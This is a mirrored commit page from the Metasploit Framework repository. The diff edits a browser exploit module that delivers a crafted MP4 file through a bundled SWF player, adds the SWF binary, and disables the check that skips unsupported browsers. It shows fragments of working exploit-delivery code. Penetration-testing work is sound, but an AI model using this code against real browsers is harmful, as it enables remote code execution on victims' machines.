mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Test out new player code
This commit is contained in:
parent
eb847a3dfb
commit
b0db18674c
BIN
data/exploits/mp4player.swf
Executable file
BIN
data/exploits/mp4player.swf
Executable file
Binary file not shown.
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
|
||||
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@ -94,19 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
#send_not_found(cli)
|
||||
#return
|
||||
my_target = targets[0]
|
||||
end
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
||||
#print_error("Sorry, not sending you the mp4 for now")
|
||||
#send_not_found(cli)
|
||||
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
# The SWF request itself
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
|
||||
return
|
||||
end
|
||||
|
||||
# Set payload depending on target
|
||||
p = payload.encoded
|
||||
|
||||
@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
|
||||
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
|
||||
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
@ -166,9 +170,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
@mp4 = create_mp4
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
|
||||
fd = ::File.open( path, "rb" )
|
||||
swf = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
return swf
|
||||
end
|
||||
|
||||
def create_mp4
|
||||
ftypAtom = "\x00\x00\x00\x20" #Size
|
||||
ftypAtom << "ftypisom"
|
||||
|
Loading…
Reference in New Issue
Block a user